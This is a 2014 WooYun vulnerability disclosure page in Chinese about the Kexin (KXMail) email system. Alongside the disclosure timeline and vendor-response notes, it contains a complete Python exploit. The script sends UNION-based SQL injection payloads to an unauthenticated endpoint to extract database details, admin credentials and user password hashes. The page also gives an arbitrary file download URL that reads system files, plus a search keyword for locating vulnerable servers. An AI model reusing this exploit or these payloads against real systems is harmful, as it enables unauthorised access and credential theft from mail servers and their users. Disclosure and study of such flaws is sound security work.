当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066892

漏洞标题:科信邮件系统漏洞注入文件任意下载等小集

相关厂商:科信软件

漏洞作者: Tea

提交时间:2014-07-01 19:15

修复时间:2014-09-29 19:16

公开时间:2014-09-29 19:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-01: 细节已通知厂商并且等待厂商处理中
2014-07-06: 厂商已经确认,细节仅向厂商公开
2014-07-09: 细节向第三方安全合作伙伴开放
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

简要描述:

存在注入,任意文件下载,无需登录

详细说明:

代码都是加密过了的。。
直接给例子吧:
EXP:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author:Tea
#Date:2014/05/21
#Ky Mail Sql Injection Exp
import re
import sys
import base64
import urllib
import httplib
def sendhttp(Url, Sobject):
RequestUrl = '/prog/get_passwd.server.php'
Rex = re.compile('\w+=*(?=\"\;)')
data = urllib.urlencode(Sobject).replace('+', '%20')
headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/html,application/xhtml+xml,application/xml"}
conn = httplib.HTTPConnection(Url)
conn.request('POST', RequestUrl, data, headers)
HttpOpen = conn.getresponse()
info = base64.b64decode(str(Rex.findall(HttpOpen.read())))
HttpOpen.close()
return info
def Get_Info(Urls ):
Info = [
'<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select user()#]]></v></e></xjxobj>',
'<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select database()#]]></v></e></xjxobj>',
'<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select version()#]]></v></e></xjxobj>',
'<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select @@datadir#]]></v></e></xjxobj>',
'<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select concat(sys_id,0x3a,sys_user,0x3a,sys_pass) from system_user limit 0,1#]]></v></e></xjxobj>,',
'<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select concat(id,0x3a,uid,0x3a,passwd,0x3a,email) from user limit 0,1#]]></v></e></xjxobj>'
]
Result = []
for i in xrange(len(Info)):
Urlpars = {
'xjxfun' : 'DoOperate',
'xjxargs[]' : Info[i]
}
Result.append(sendhttp(Urls, Urlpars))
return Result
def main():
if len(sys.argv) != 2:
print 'Use: %s www.baidu.com' % sys.argv[0]
sys.exit()
Vurl = sys.argv[1]
print 'Author:Tea'
print '-------------------------------------------------------------------------------'
Info = Get_Info(Vurl)
for i in range(len(Info)):
print 'Info: %s' % Info[i]
if __name__ == '__main__':
main()


关键字:
powered by kxmail
另外任意文件下载:
http://mail.xxx.com/prog/get_composer_att.php?att_size=1623&filenamepath=C:\boot.ini&maxatt_sign=4bc882e8c4a98ac7a97acd321aad4f88&attach_filename=boot.ini
&attach_filename=boot.ini 保存文件名
&filenamepath=C:\boot.ini 下载的文件路径以及文件名

漏洞证明:

漏洞证明:

1.jpg


2.jpg


3.jpg

修复方案:

都是无需登录,注入,跟任意文件下载,你们比我清楚,看不见代码。

版权声明:转载请注明来源 Tea@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-06 11:06

厂商回复:

CNVD确认并复现所述多个实例情况,由CNVD再次协调软件生产厂商处置,联系科信软件,189 8218 ****,对方不配合处置,后发网站客服邮箱service 。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-07-07 00:37 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    联系科信软件,189 8218 ****,对方不配合处置

  2. 2014-07-29 10:14 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    对方不配合处置,后发网站客服邮箱service 哈哈